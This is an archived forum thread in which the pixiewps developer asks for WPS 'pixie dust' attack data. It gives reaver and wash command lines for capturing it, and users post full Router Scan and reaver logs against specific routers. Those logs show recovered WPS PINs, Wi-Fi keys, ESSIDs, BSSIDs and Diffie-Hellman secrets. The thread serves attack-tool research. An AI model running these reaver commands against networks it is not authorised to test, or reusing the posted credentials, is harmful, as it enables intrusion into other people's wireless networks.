Data gathering for pixiewps (pixie dust attack) [Archive]

View Full Version : Data gathering for pixiewps (pixie dust attack)

wiire

2017-11-09, 19:28

Hi everyone,
we have decided to start collecting data again for the WPS pixie dust attack (pixiewps), however we will be thorough this time:

The data must be collected with Reaver 1.6.3 and with the new -vvv debug option (now included in kali)
A set of data must contain a full transaction from M1 to M7 (thus you MUST know the PIN)
2 consecutive transactions (2 sets of data close in time) would be ideal (run reaver once, grab the data, then run reaver again, grab the new data)
The data should be filtered with logfilter.py (https://github.com/t6x/reaver-wps-fork-t6x/blob/master/tools/logfilter.py)
Please include the model / name of the router (possibly using wash --json for the specific router, you can edit out the BSSID and ESSID for privacy reasons)
DO NOT use -S (--dh-small)
Which data we want? See below:

Realtek that pixiewps can't pwn (some RTL8671 ?)
Data where nonces (E-nonce) follow a weird pattern like xx:xx:00:00..., 00:00:xx:xx... etc. (eg. 00:00:42:b4:00:00:6a:2e:00:00:07:80:00:00:43:45)

The latest pixiewps (https://github.com/wiire-a/pixiewps) uses multi-threading so you may want to use that instead of the one included in kali. Some changes are still in the works so I won't push a new tag for now.

To collect data you can use something like this (be sure to use the correct pin):

sudo -i
reaver -vvv -i MONITOR -b BSSID -p PIN 2>&1 | tee reaver.log
cat reaver.log | python2 logfilter.py 1>&2 2>PIXIEDATA.TXT
wash -i MONITOR -j --scan -n 25 | grep -i BSSID | tee ROUTERDATA.JSON

You can also copy and paste the full logs if you have problems following this procedure.

Remember that in most cases WPS 2.0 locks after 10 FAILED attempts. After that a reboot is required to reset.

Why collecting data again after all this time?
Pixiewps has improved overtime, now it's more mature and so is Reaver. But there are still potential vulnerable devices out there and margins for improvement overall.

Please keep the thread related to gathering data only. Post questions only if important. That is also the reason why I'm starting a new thread, the others are too much clogged up. Hope mods don't mind :)

binarymaster

2017-11-22, 19:10

The data must be collected with Reaver 1.6.3 and with the new -vvv debug option (now included in kali)
Is it ok to post the data from latest Router Scan nightly build? Here's one for example:

Huawei HG8245H (device #1)

Audit started at 2017.11.22 22:06:30 (UTC+03:00).

E-Nonce: 68BE01DF8A8DB9794F3126C582F9A274

PKE: E8CCCEBB58C29F9F4850E63E2E9206623765CCC8BBC0382C53 1E62FD8B90BF2FC7A132F398D7E8E037160BBFAB1E30E95856 FF813E88282CD2CA42CE905A9CF7FBEB9D206EF6BFDB955900 30D7A3D41FC9F362F2AFF3ED9FC14534E2872C8319EFEA5524 DEE674EDC43843628C9F8F02CE675DB76B4B5A679C1375420E 0304136E1E7C917602598E696DEDEE76B17601C8F01E50EE8C FDC023A774670EF00B96E3DABB2E963BA81A8FFEDD699A71D4 1581400691D39772CF1B150D6B907279CF

Manufacturer: Huawei

Model Name: Huawei

Model Number: HG8245H

Serial Number: 39

Device Name: HuaweiONT

PKR: E40D6B624FB03754E7231B8CBECA1C049DEB272173227B768E 3D2C860E9E0C8EC1FFA4D7DBD1F8B2486EDFDB510AA19EE2D6 598210D135DC226BC4181AB7197993B39A7270CD7A7DD60FCA 03EDE3697C1F8B21962878157169EF17D099D769CF24874A2E 077696DEAAF152C485E09F733445191D6D44A22187F241F2B3 A9737E96AEFAF27378775A623844AD16AA48A69B4C07772C92 9843D9EACF77E9FCEE514BAC7602C16A0CB8048BD52FAAB646 6055EF38B630E937717060AEAD79EC59EF

AuthKey: A1778780E59EC72194AF1BC977FAE6ED1214126151D1509AA4 9CF0298E19CD4E

E-Hash1: 02D302C8AA7E2D3AB161C48AF29E439F438C4903E298B3FFE6 F5B0845C97A58E

E-Hash2: C77B53318827FC12DF2ECFDB445BC702E848D3BBD0156D6B87 8221465A82B42E

E-S1: DE030256AF7F4A8D5E52FBEA277C471D

E-S2: EF25F4668C2FE0FB55BCA8973094690E

Audit stopped at 2017.11.22 22:06:39 (UTC+03:00).

Audit started at 2017.11.22 22:06:40 (UTC+03:00).

E-Nonce: C240EB3DAC82A15C913C893D9FACEF42

PKE: A5EA92289132F132D8ADADA9D8169C89F0645B1757E7D1FCA3 FDA81D41E4501FA99641D8D4865DA72709FCC6676276982679 3F7FCE685ECBABBFEC880951A4A2E4C2BA45E7DE20D3FFD0BC 44868DE2E1AE8C267B50DB41F6543EA358277FCA1FD98CF682 CAAFE522D751DD71DD4B88B90C5BCB03195F78C6EB05376E0A 437A6B657472D99E4A671A0158FCAF6CD242762B8E36E1C4A4 1085D8ED8DDE44588325E1AE32AB77C0953DA047F30D431C2C 06DECEC4AD341FEF9C350D37935FF89690

PKR: B2A1FC3590D9C2AD249E0368C0919AD142E16144727F8E6A2B D7BF1F7A85488FBC2876189617EAA78C24E02697C81FD5D181 20B31A82B84B349EA1E11E592224B8151095647C4A1EF79D47 F7D1451D78380B7F0F90BFCD60D9C2E453FD54BE93152A06D0 30E54A72F0384E110352D68014EA8977DB61A0FCFFB38A665B 3D1ACC0FED9A0EDD1A2FA0A9A438BB16AA2E5B425E9203BDDF 4A71D0897551AC1879013E26985D6BB4ABF8EECCC86B22A2BF E9E8CC6BCEC215B7D2D6C57BF396BAF321

AuthKey: 8850EABC8F169ABF32C8A35AB560355665E7612729BBBBB629 AA741C8AB89088

E-Hash1: 8C1CA9A83EFE84CD7E0564B11904B2B3374E2B4D386B18DB4E 8AB0EE54DD3BC9

E-Hash2: 15BFE6BB5FE0198FC3B8466F038CB64291B1825CBB87784DB8 2296AB686782B5

E-S1: 0715E717B90532588D2448049FE0D744

E-S2: 5A3C4CEBB2EE1D30B6E822EE6CCA7450

Audit stopped at 2017.11.22 22:06:49 (UTC+03:00).

wiire

2017-11-24, 09:54

Yes, thank you. Enrollee nonce, the 2 secret nonces and details like brand, model etc. are the most important data :)

Sorry I haven't replied sooner, I had problems logging in on the forum.

@everyone
If you have troubles following the instructions, just copy and past the full logs by hand. Maybe use a pastebin or similar if you don't want to clog everything up.

ForumKali2016

2017-12-05, 17:49

ASUS ADSL home gateway, model DSL-N10E, firmware ver. 2.1.19_EU

Realtek that pixiewps can't pwn (some RTL8671 ?)
Data where nonces (E-nonce) follow a weird pattern like xx:xx:00:00..., 00:00:xx:xx... etc. (eg. 00:00:42:b4:00:00:6a:2e:00:00:07:80:00:00:43:45)
2 datasets below

Audit started at 2017.12.05 19:51:00 (UTC+02:00).

Associating with AP...

[+] Associated with 74:D0:2B:84:41:D7 (ESSID: Natalya).

Trying pin "13850319"...

Sending EAPOL Start...

Received Identity Request.

Sending Identity Response...

Received WPS Message M1.

E-Nonce: 0000497B000030CF00003B58000042CB

PKE: D0141B15656E96B85FCEAD2E8E76330D2B1AC1576BB026E7A3 28C0E1BAF8CF91664371174C08EE12EC92B0519C54879F2125 5BE5A8770E1FA1880470EF423C90E34D7847A6FCB4924563D1 AF1DB0C481EAD9852C519BF1DD429C163951CF69181B132AEA 2A3684CAF35BC54ACA1B20C88BB3B7339FF7D56E09139D77F0 AC58079097938251DBBE75E86715CC6B7C0CA945FA8DD8D661 BEB73B414032798DADEE32B5DD61BF105F18D89217760B75C5 D966A5A490472CEBA9E3B4224F3D89FB2B

Manufacturer: Realtek Semiconductor Corp.

Model Name: ADSL Router

Model Number: EV-2006-07-27

Serial Number: 123456789012347

Device Name: ADSL Router/Modem IGD

Sending WPS Message M2...

PKR: 3B617AD18518A5D021C6B8EB2BC8DF881CF9DF7FB00C1C4E48 5C8F068B4871BA5ADDD26C4F6FBFB479EF8298CFE2D39387E0 18656009DBD3D17F00FFA6F49D6577D48D2A84F0BF12AC111E 122FD3C9F8996DB7856C38C54AD203AFF0F3E4D8D3E442DA0A 67A19FE5DDB097BA7672B3504B1AC3466CDAEE183039BC8C99 C5AD86787355821707B6223C6005CB1F690E0590381B93E08B 1C163050AEA0A104EA22DE422B9CD76AF37D8C8C3B596A43FD 0B6FB617376C2792951E8C7B231B7B8583

AuthKey: 1FB4802250487E98E4B0F9D5AD0C859348AC6CC583ECBCEB6B 6B5D9D880864C1

Received WPS Message M3.

E-Hash1: 4C6143B908F5226DEE0C40078478FDFD3495571DCFEDB2A912 424D79E361E3C1

E-Hash2: F6D95087CDE720EBD0DAEDD7511DE6A6A8FC6697F88579AFEF 12A3F399D6D64A

Sending WPS Message M4...

Received WPS Message M5.

E-S1: 00001003000015AE000015B700005776

[+] First half found: 1385

Sending WPS Message M6...

Received WPS Message M7.

E-S2: 0000139000001AF4000016B300003383

Sending WSC NACK...

EAP session closed.

[+] WPS PIN: 13850319

[+] SSID: Natalya

[+] Key: 1234567890

[+] Key Index: 1

Audit stopped at 2017.12.05 19:51:09 (UTC+02:00).

Audit started at 2017.12.05 19:51:10 (UTC+02:00).

Associating with AP...

[+] Associated with 74:D0:2B:84:41:D7 (ESSID: Natalya).

Trying pin "13850319"...

Sending EAPOL Start...

[-] Request timed out.

Trying pin "13850319"...

Sending EAPOL Start...

Received Identity Request.

Sending Identity Response...

Received WPS Message M1.

E-Nonce: 000079F70000103D000030B600007DEC

PKE: D0141B15656E96B85FCEAD2E8E76330D2B1AC1576BB026E7A3 28C0E1BAF8CF91664371174C08EE12EC92B0519C54879F2125 5BE5A8770E1FA1880470EF423C90E34D7847A6FCB4924563D1 AF1DB0C481EAD9852C519BF1DD429C163951CF69181B132AEA 2A3684CAF35BC54ACA1B20C88BB3B7339FF7D56E09139D77F0 AC58079097938251DBBE75E86715CC6B7C0CA945FA8DD8D661 BEB73B414032798DADEE32B5DD61BF105F18D89217760B75C5 D966A5A490472CEBA9E3B4224F3D89FB2B

Manufacturer: Realtek Semiconductor Corp.

Model Name: ADSL Router

Model Number: EV-2006-07-27

Serial Number: 123456789012347

Device Name: ADSL Router/Modem IGD

Sending WPS Message M2...

PKR: 6C61743CBE029AD0455553B23F05F154A076140505CB9C29F3 D3685652F4A10EAB2C7C8E8C5DD039033A08CF3CA078940C8A 8A00CE7D171E364F611E897DD9486C287755E30357275D6CEB 7E97101C2D71398C3E2960384B169883C9FC7068E64E680FD7 3558A317C197CAB19CD669F0BD65CDB57F419B91F56E6473D6 A112E2D79685258D2E6AC3DD5659D45FA759BDD420BF5FA9C8 702E8021BF45DE2E42488BE048A59024D9B471DC05B03B0CE7 AF8945CF95848857CEF2F6C663C55218F4

AuthKey: 0EF51A6ED5BEE1647480B874EFD0400010F7D287429132E3FD 912ED1B5002BE9

Received WPS Message M3.

E-Hash1: 1B761BB7DE29C0CF8839B6F0858583814F001E95EFBF918F27 C640A532207941

E-Hash2: B74C37199A8FB5A22DA2EC48DE2D2919F17D658E10FFD6CFFB B92E9775480771

Sending WPS Message M4...

Received WPS Message M5.

E-S1: 00007EB90000327A00000A9800002491

[+] First half found: 1385

Sending WPS Message M6...

Received WPS Message M7.

E-S2: 00000246000037BF00000B940000009E

Sending WSC NACK...

EAP session closed.

[+] WPS PIN: 13850319
[+] SSID: Natalya
[+] Key: 1234567890
[+] Key Index: 1

Audit stopped at 2017.12.05 19:51:25 (UTC+02:00).

Audit started at 2017.12.05 19:51:30 (UTC+02:00).

Associating with AP...

[+] Associated with 74:D0:2B:84:41:D7 (ESSID: Natalya).

Trying pin "13850319"...

Sending EAPOL Start...

Received Identity Request.

Sending Identity Response...

Received WPS Message M1.

E-Nonce: 000071E400005D9D000073000000066A

PKE: D0141B15656E96B85FCEAD2E8E76330D2B1AC1576BB026E7A3 28C0E1BAF8CF91664371174C08EE12EC92B0519C54879F2125 5BE5A8770E1FA1880470EF423C90E34D7847A6FCB4924563D1 AF1DB0C481EAD9852C519BF1DD429C163951CF69181B132AEA 2A3684CAF35BC54ACA1B20C88BB3B7339FF7D56E09139D77F0 AC58079097938251DBBE75E86715CC6B7C0CA945FA8DD8D661 BEB73B414032798DADEE32B5DD61BF105F18D89217760B75C5 D966A5A490472CEBA9E3B4224F3D89FB2B

Manufacturer: Realtek Semiconductor Corp.

Model Name: ADSL Router

Model Number: EV-2006-07-27

Serial Number: 123456789012347

Device Name: ADSL Router/Modem IGD

Sending WPS Message M2...

PKR: 4870430F9757C2871408F388EF668FE241502E28864A3F4D8F 7E2B44D0E4BAFD284FFE81EFA5F1803C69969C49DF851BD5C6 5D828DBF685873C99025D565175023D142F5B73BEB807D1630 1853DE3B1E0427DF213B7A44820D1748576B2154620932B383 142510C6D771BFAA715E1C17465456257C7010EE19E3FF7AA2 DED803175D326B5BE102A0FD5B8077FD1E8359BA4AD59EB6F4 9F95302F4CDB3B64CE5D7FF809206B9B7125CEB288F20C18C5 772699BEB04E0569229128CDD918F34B47

AuthKey: 56EB940A1260E08AD7871738D62D619EA88A163ABCC1EEEC45 651B7D1991CAEE

Received WPS Message M3.

E-Hash1: DB2D80359B0D842048CB15BB3A8A55DE241B741E43459AB193 8CD5A11AC5AF1F

E-Hash2: 045B9585812EE096F4325642C06739A91D9E8F5B51A5B6BC89 96B91DC6A1CCFB

Sending WPS Message M4...

Received WPS Message M5.

E-S1: 00007DBF00000A6400004ED900006529

[+] First half found: 1385

Sending WPS Message M6...

Received WPS Message M7.

E-S2: 0000014B00000FA900004FD500004136

Sending WSC NACK...

EAP session closed.

[+] WPS PIN: 13850319

[+] SSID: Natalya
[+] Key: 1234567890
[+] Key Index: 1
Audit stopped at 2017.12.05 19:51:39 (UTC+02:00).

wiire

2017-12-05, 22:26

@ForumKali2016 Thank you very much!

The router seems to be bugged, but not broken since the protocol goes through correctly (to M7).

0000497b 000030cf 00003b58 000042cb
00001003 000015ae 000015b7 00005776
00001390 00001af4 000016b3 00003383

000079f7 0000103d 000030b6 00007dec
00007eb9 0000327a 00000a98 00002491
00000246 000037bf 00000b94 0000009e

000071e4 00005d9d 00007300 0000066a
00007dbf 00000a64 00004ed9 00006529
0000014b 00000fa9 00004fd5 00004136

Here's what you could do :
- collect 20 - 30 consecutive sets of data, trying to keep the same distance in time between the runs (ie with a script, I'm sure @binarymaster would help)
- record the exact date and time of the router when you start the whole process
- check if NTP is enabled and if the router has the correct date and time set

That would help a lot. Thank you again!

ForumKali2016

2017-12-08, 17:27

new datasets - untouched output from fresh kali distro terminal
http://www43.zippyshare.com/v/oioRqXdZ/file.html
Reaver started just at 18:44:00 GMT+2 08.12.2017 by router clock (or maybe +-2 sec). Delay between attempts = 1 sec or less, i tried restart reaver so fast as i can, but some miss clicks presents.

wiire

2017-12-09, 15:15

OK, thank you! Meanwhile I think @binarymaster was adding some features to RS, to make it easier for testing / gathering data.

ParanoiA609

2018-01-22, 14:55

Are you looking for only devices that are unknown to be vulnerable or all devices?

bigbiz

2018-02-08, 06:27

I have all data copied and pasted into my terminal but then is says .28 milsecs to find wps pin. No pin found. Am I supposed to type some extra info. My router is a wifi robin?aka wifi robber. Is the strings supposed to have dashes or in brackets. Thank you wiire!! Have included essid.

Mister_J

2018-02-20, 21:20

I usually run reaver -i wlan0 -b BSSID -c 1 -vv -K 1 -f -N, which I found that is able to quickly works on vulnerable routers (Ralink and Realtek).

Today I test it on another Ralink router and after a while pixiewps, after telling me "WPS pin not found!" it told me "Looks like you have some interesting data! Please consider contributing with your data to improve pixiewps"

So here I am.
My environment:

Reaver v1.6.4-git-17-g6833d00 - Pixiewps 1.4.2 both from the latest commits on Github.
Alfa AUS036NHA - Atheros Communications, Inc. AR9271 802.11n

I read the instructions, but I still don't know the PIN code, so I however collected logs files.

I don't want to publicly share these logs, there is a way to send you a PM? I am also on Github, but also there I don't see a way to send you a PM. Let me know.

sum1n

2018-04-18, 05:53

reaver -i wlan0mon -b F4:3E:61:89:44:EB -c 1 -vvv -K 3

Reaver v1.6.4 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <[email protected]>

[+] Switching wlan0mon to channel 1
[+] Waiting for beacon from F4:3E:61:89:44:EB
[+] Received beacon from F4:3E:61:89:44:EB
WPS: A new PIN configured (timeout=0)
WPS: UUID - hexdump(len=16): [NULL]
WPS: PIN - hexdump_ascii(len=8):
31 32 33 34 35 36 37 30 12345670
WPS: Selected registrar information changed
WPS: Internal Registrar selected (pbc=0)
WPS: sel_reg_union
WPS: set_ie
WPS: cb_set_sel_reg
WPS: Enter wps_cg_set_sel_reg
WPS: Leave wps_cg_set_sel_reg early
WPS: return from wps_selected_registrar_changed
[+] Trying pin "12345670"
send_packet called from deauthenticate() 80211.c:326
send_packet called from authenticate() 80211.c:357
[+] Sending authentication request
send_packet called from associate() 80211.c:410
[+] Sending association request
[+] Associated with F4:3E:61:89:44:EB (ESSID: Digicom)
[+] Sending EAPOL START request
send_packet called from send_eapol_start() send.c:48
[+] Received identity request
[+] Sending identity response
send_packet called from send_identity_response() send.c:81
[+] Received identity request
[+] Sending identity response
send_packet called from send_identity_response() send.c:81
[+] Received identity request
[+] Sending identity response
send_packet called from send_identity_response() send.c:81
[+] Received identity request
[+] Sending identity response
send_packet called from send_identity_response() send.c:81
[+] Received identity request
[+] Sending identity response
send_packet called from send_identity_response() send.c:81
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
WPS: Processing received message (len=539 op_code=4)
WPS: Received WSC_MSG
WPS: Parsed WSC_MSG
WPS: Received M1
WPS: UUID-E - hexdump(len=16): 63 04 12 53 10 19 20 06 12 28 f4 3e 61 89 44 eb
WPS: Enrollee MAC Address f4:3e:61:89:44:eb
WPS: Enrollee Nonce - hexdump(len=16): 00 00 67 ea 00 00 7a 02 00 00 00 48 00 00 7d 4c
WPS: Enrollee Authentication Type flags 0x27
WPS: No match in supported authentication types (own 0x0 Enrollee 0x27)
WPS: Workaround - assume Enrollee does not advertise supported authentication types correctly
WPS: Enrollee Encryption Type flags 0xf
WPS: No match in supported encryption types (own 0x0 Enrollee 0xf)
WPS: Workaround - assume Enrollee does not advertise supported encryption types correctly
WPS: Enrollee Connection Type flags 0x1
WPS: Enrollee Config Methods 0x86 [Ethernet] [Label] [PBC]
WPS: Prefer PSK format key due to Enrollee not supporting display
WPS: Enrollee Wi-Fi Protected Setup State 2
WPS: Manufacturer - hexdump_ascii(len=64):
52 65 61 6c 74 65 6b 20 53 65 6d 69 63 6f 6e 64 Realtek Semicond
75 63 74 6f 72 20 43 6f 72 70 2e 00 00 00 00 00 uctor Corp._____
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ________________
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ________________
WPS: Model Name - hexdump_ascii(len=32):
52 54 4c 38 36 37 31 00 00 00 00 00 00 00 00 00 RTL8671_________
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ________________
WPS: Model Number - hexdump_ascii(len=32):
45 56 2d 32 30 30 36 2d 30 37 2d 32 37 00 00 00 EV-2006-07-27___
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ________________
WPS: Serial Number - hexdump_ascii(len=32):
31 32 33 34 35 36 37 38 39 30 31 32 33 34 37 00 123456789012347_
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ________________
WPS: Primary Device Type: 6-0050F204-1
WPS: Device Name - hexdump_ascii(len=32):
41 44 53 4c 20 52 6f 75 74 65 72 2f 4d 6f 64 65 ADSL Router/Mode
6d 20 49 47 44 00 00 00 00 00 00 00 00 00 00 00 m IGD___________
WPS: Enrollee RF Bands 0x1
WPS: Enrollee Association State 0
WPS: Device Password ID 0
WPS: Enrollee Configuration Error 0
WPS: OS Version 10000000
WPS: M1 Processed
WPS: dev_pw_id checked
WPS: PBC Checked
WPS: Entering State SEND_M2
WPS: WPS_CONTINUE, Freeing Last Message
WPS: WPS_CONTINUE, Saving Last Message
WPS: returning
[+] Received M1 message
WPS: Found a wildcard PIN. Assigned it for this UUID-E
WPS: Registrar Nonce - hexdump(len=16): 90 37 ce 11 e5 3c 1c 4f ca ed 90 68 c4 35 a1 7c
WPS: UUID-R - hexdump(len=16): 27 3d a8 4f b2 bd 56 44 50 d0 38 3a cf af 13 a8
WPS: Building Message M2
WPS: * Version
WPS: * Message Type (5)
WPS: * Enrollee Nonce
WPS: * Registrar Nonce
WPS: * UUID-R
WPS: * Public Key
WPS: Generate new DH keys
DH: private value - hexdump(len=192): 39 3c e6 ea a0 2e 0a 9e 32 86 88 b8 80 f0 3d 4a 3c 76 1f 40 9c d4 a5 71 6a 83 13 bf 30 6c e4 18 ad 3b da c4 c1 7b 24 66 62 51 fe 83 11 b0 77 9b da cd 24 4b 3f 86 2f a8 33 58 76 42 e7 11 bc 69 5e a2 97 41 fd e4 d9 58 be 30 fc de ea db 94 6f ea 2d 5b 79 d0 f5 b1 99 02 ae ef 97 ab f3 8e c9 0d e4 be cb 99 70 c1 02 0f c3 64 a0 c2 01 54 05 6e 49 7c cc 49 2a 2a 09 1f ab f4 23 74 2d 9b c9 75 78 79 1a 38 69 eb 6a 65 1a 45 56 90 de 68 ec f8 05 f2 c6 70 fd 21 6e 78 2c d6 1f bf b1 c9 28 6b 55 2d 66 18 e5 1a 83 72 7f ab 3e 0e 82 d2 ed b4 f7 2d 70 5b 00 4c 57 62 9a a3 b3 c0 a4 da 08
DH: public value - hexdump(len=192): db eb 5b 1f b9 9f c3 60 6e 38 b9 05 e7 72 08 e0 e3 07 36 63 26 de 5f ef b5 23 04 09 a0 46 51 4e 91 61 6d 99 da ed f7 ea c2 94 1c b2 7e c9 d1 0a 21 94 f2 da 31 01 72 a1 bb b8 19 a6 27 44 c1 2f 13 4c ad 1c d8 98 62 87 74 2d 7f 1f d7 f6 69 ba ff 8e 58 c5 69 09 d4 5f e8 56 93 60 c9 7d 53 3f ab c1 58 95 d3 7a 37 2d 7b f5 95 ba 90 08 45 4c 89 dc a2 7e 8e 33 b2 87 31 c4 00 ff 4d 7d 33 c2 ef 85 b6 61 ec 04 fe 0f 48 8f c4 54 aa 1b 1d 5b 3b 6f ae e7 c0 46 2f ed 9d 9a 1c 20 67 76 47 36 b0 8f 8b 20 70 96 25 56 51 bf d3 c9 6d ba cf 6f 21 5a c3 c2 ea 5b 6a 79 5f 4f da 70 b5 7a ac 8f
WPS: DH Private Key - hexdump(len=192): 39 3c e6 ea a0 2e 0a 9e 32 86 88 b8 80 f0 3d 4a 3c 76 1f 40 9c d4 a5 71 6a 83 13 bf 30 6c e4 18 ad 3b da c4 c1 7b 24 66 62 51 fe 83 11 b0 77 9b da cd 24 4b 3f 86 2f a8 33 58 76 42 e7 11 bc 69 5e a2 97 41 fd e4 d9 58 be 30 fc de ea db 94 6f ea 2d 5b 79 d0 f5 b1 99 02 ae ef 97 ab f3 8e c9 0d e4 be cb 99 70 c1 02 0f c3 64 a0 c2 01 54 05 6e 49 7c cc 49 2a 2a 09 1f ab f4 23 74 2d 9b c9 75 78 79 1a 38 69 eb 6a 65 1a 45 56 90 de 68 ec f8 05 f2 c6 70 fd 21 6e 78 2c d6 1f bf b1 c9 28 6b 55 2d 66 18 e5 1a 83 72 7f ab 3e 0e 82 d2 ed b4 f7 2d 70 5b 00 4c 57 62 9a a3 b3 c0 a4 da 08
WPS: DH own Public Key - hexdump(len=192): db eb 5b 1f b9 9f c3 60 6e 38 b9 05 e7 72 08 e0 e3 07 36 63 26 de 5f ef b5 23 04 09 a0 46 51 4e 91 61 6d 99 da ed f7 ea c2 94 1c b2 7e c9 d1 0a 21 94 f2 da 31 01 72 a1 bb b8 19 a6 27 44 c1 2f 13 4c ad 1c d8 98 62 87 74 2d 7f 1f d7 f6 69 ba ff 8e 58 c5 69 09 d4 5f e8 56 93 60 c9 7d 53 3f ab c1 58 95 d3 7a 37 2d 7b f5 95 ba 90 08 45 4c 89 dc a2 7e 8e 33 b2 87 31 c4 00 ff 4d 7d 33 c2 ef 85 b6 61 ec 04 fe 0f 48 8f c4 54 aa 1b 1d 5b 3b 6f ae e7 c0 46 2f ed 9d 9a 1c 20 67 76 47 36 b0 8f 8b 20 70 96 25 56 51 bf d3 c9 6d ba cf 6f 21 5a c3 c2 ea 5b 6a 79 5f 4f da 70 b5 7a ac 8f
WPS: DH Private Key - hexdump(len=192): 39 3c e6 ea a0 2e 0a 9e 32 86 88 b8 80 f0 3d 4a 3c 76 1f 40 9c d4 a5 71 6a 83 13 bf 30 6c e4 18 ad 3b da c4 c1 7b 24 66 62 51 fe 83 11 b0 77 9b da cd 24 4b 3f 86 2f a8 33 58 76 42 e7 11 bc 69 5e a2 97 41 fd e4 d9 58 be 30 fc de ea db 94 6f ea 2d 5b 79 d0 f5 b1 99 02 ae ef 97 ab f3 8e c9 0d e4 be cb 99 70 c1 02 0f c3 64 a0 c2 01 54 05 6e 49 7c cc 49 2a 2a 09 1f ab f4 23 74 2d 9b c9 75 78 79 1a 38 69 eb 6a 65 1a 45 56 90 de 68 ec f8 05 f2 c6 70 fd 21 6e 78 2c d6 1f bf b1 c9 28 6b 55 2d 66 18 e5 1a 83 72 7f ab 3e 0e 82 d2 ed b4 f7 2d 70 5b 00 4c 57 62 9a a3 b3 c0 a4 da 08
WPS: DH peer Public Key - hexdump(len=192): d0 14 1b 15 65 6e 96 b8 5f ce ad 2e 8e 76 33 0d 2b 1a c1 57 6b b0 26 e7 a3 28 c0 e1 ba f8 cf 91 66 43 71 17 4c 08 ee 12 ec 92 b0 51 9c 54 87 9f 21 25 5b e5 a8 77 0e 1f a1 88 04 70 ef 42 3c 90 e3 4d 78 47 a6 fc b4 92 45 63 d1 af 1d b0 c4 81 ea d9 85 2c 51 9b f1 dd 42 9c 16 39 51 cf 69 18 1b 13 2a ea 2a 36 84 ca f3 5b c5 4a ca 1b 20 c8 8b b3 b7 33 9f f7 d5 6e 09 13 9d 77 f0 ac 58 07 90 97 93 82 51 db be 75 e8 67 15 cc 6b 7c 0c a9 45 fa 8d d8 d6 61 be b7 3b 41 40 32 79 8d ad ee 32 b5 dd 61 bf 10 5f 18 d8 92 17 76 0b 75 c5 d9 66 a5 a4 90 47 2c eb a9 e3 b4 22 4f 3d 89 fb 2b
DH: shared key - hexdump(len=192): 21 04 3f b4 9d 84 b2 d5 96 d7 aa 36 73 db 5b c0 5e 79 e6 de f2 97 18 10 0e f6 64 0d a8 e7 31 0f 15 32 3a 97 c7 86 e9 6e 51 5c f6 dc e3 78 16 d6 0e 18 55 f7 dc bb 57 4f 24 98 9e 22 0b d8 70 8b 3a f6 ac 3d b9 cd 6d fa bc d8 64 be c6 19 b2 18 ae d0 43 74 d6 c5 0e 79 9b 54 00 39 a7 5a dc dc 6e de cb dc 00 d0 38 38 74 7b 33 52 2a f9 06 fa 5f 3d 6f 37 56 35 76 d3 3d c1 01 98 9e 4c bd 63 b8 0f e4 7c ef 26 f5 82 88 95 4e 9a f8 ae ef ff 4d dc 24 5b 43 e8 e9 59 04 9d 3e d2 cd bb a2 8a 94 ad b8 7f 5c 8f 4b 92 c3 19 a1 80 95 fb b8 c4 5c aa 24 05 ec ae e9 5a 08 03 4a a8 43 35 31 07
WPS: DH shared key - hexdump(len=192): 21 04 3f b4 9d 84 b2 d5 96 d7 aa 36 73 db 5b c0 5e 79 e6 de f2 97 18 10 0e f6 64 0d a8 e7 31 0f 15 32 3a 97 c7 86 e9 6e 51 5c f6 dc e3 78 16 d6 0e 18 55 f7 dc bb 57 4f 24 98 9e 22 0b d8 70 8b 3a f6 ac 3d b9 cd 6d fa bc d8 64 be c6 19 b2 18 ae d0 43 74 d6 c5 0e 79 9b 54 00 39 a7 5a dc dc 6e de cb dc 00 d0 38 38 74 7b 33 52 2a f9 06 fa 5f 3d 6f 37 56 35 76 d3 3d c1 01 98 9e 4c bd 63 b8 0f e4 7c ef 26 f5 82 88 95 4e 9a f8 ae ef ff 4d dc 24 5b 43 e8 e9 59 04 9d 3e d2 cd bb a2 8a 94 ad b8 7f 5c 8f 4b 92 c3 19 a1 80 95 fb b8 c4 5c aa 24 05 ec ae e9 5a 08 03 4a a8 43 35 31 07
WPS: DHKey - hexdump(len=32): c6 43 ba d8 20 89 9e 53 cb 45 62 b5 b6 95 14 46 3f b4 96 84 6f 50 4f 5f 9e 8d 7c 3f fc 69 a9 7c
WPS: KDK - hexdump(len=32): 9f 46 9a 59 68 64 8b e2 3e 29 92 27 51 c5 41 48 82 99 b6 a3 ca bb 16 7c 70 97 fb 51 f9 67 a8 e0
WPS: AuthKey - hexdump(len=32): 0e 56 92 3c fa 30 43 ef 25 a8 24 3a 45 5c 23 dc ec d0 75 b5 60 87 e6 88 76 90 4a 98 9f 12 d2 30
WPS: KeyWrapKey - hexdump(len=16): 68 bf aa 33 1f 2e d6 85 c9 28 7b de d2 18 3c 3b
WPS: EMSK - hexdump(len=32): 1d 08 31 9d 3a 8e e4 65 27 ea 36 34 08 11 09 9b dd 7f 8b 27 b4 58 4c 62 3c bc 24 5e 76 84 ee 10
WPS: * Authentication Type Flags
WPS: * Encryption Type Flags
WPS: * Connection Type Flags
WPS: * Config Methods (8c)
WPS: * Manufacturer
WPS: * Model Name
WPS: * Model Number
WPS: * Serial Number
WPS: * Primary Device Type
WPS: * Device Name
WPS: * RF Bands (0)
WPS: * Association State
WPS: * Configuration Error (0)
WPS: * Device Password ID (0)
WPS: * OS Version
WPS: * Authenticator
[+] Sending M2 message
send_packet called from send_msg() send.c:116
WPS: Processing received message (len=539 op_code=4)
WPS: Received WSC_MSG
WPS: Parsed WSC_MSG
WPS: Received M1
WPS: Unexpected state (15) for receiving M1
WPS: returning
[+] Received M1 message
WPS: Building Message WSC_NACK
WPS: * Version
WPS: * Message Type (14)
WPS: * Enrollee Nonce
WPS: * Registrar Nonce
WPS: * Configuration Error (0)
[+] Sending WSC NACK
send_packet called from send_msg() send.c:116
WPS: Building Message WSC_NACK
WPS: * Version
WPS: * Message Type (14)
WPS: * Enrollee Nonce
WPS: * Registrar Nonce
WPS: * Configuration Error (0)
[+] Sending WSC NACK
send_packet called from send_msg() send.c:116
send_packet called from send_termination() send.c:142
[!] WPS transaction failed (code: 0x03), re-trying last pin
WPS: Invalidating used wildcard PIN
